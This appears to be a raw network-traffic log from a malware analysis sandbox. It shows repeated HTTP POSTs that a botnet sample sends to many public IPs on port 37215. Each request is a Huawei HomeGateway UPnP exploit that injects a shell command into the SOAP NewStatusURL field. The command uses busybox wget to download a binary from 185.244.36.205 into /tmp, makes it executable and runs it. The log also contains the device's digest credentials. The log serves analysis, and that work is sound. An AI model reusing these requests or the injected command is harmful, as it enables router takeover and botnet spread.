                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1195192.168.2.1548008138.144.134.8337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.395987988 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1196192.168.2.1533294181.46.242.18037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396070957 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1197192.168.2.1547308186.154.14.7637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396070957 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1198192.168.2.1554120138.198.96.4637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396086931 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1199192.168.2.155328841.217.190.16937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396105051 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1200192.168.2.1557014186.112.127.18537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396116018 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1201192.168.2.1546258156.124.27.18737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396116018 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1202192.168.2.1538198222.162.221.13637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396140099 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1203192.168.2.1547202156.253.119.2637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396150112 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1204192.168.2.1535718190.45.129.20337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396152973 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1205192.168.2.1536032197.36.0.19337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396178007 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
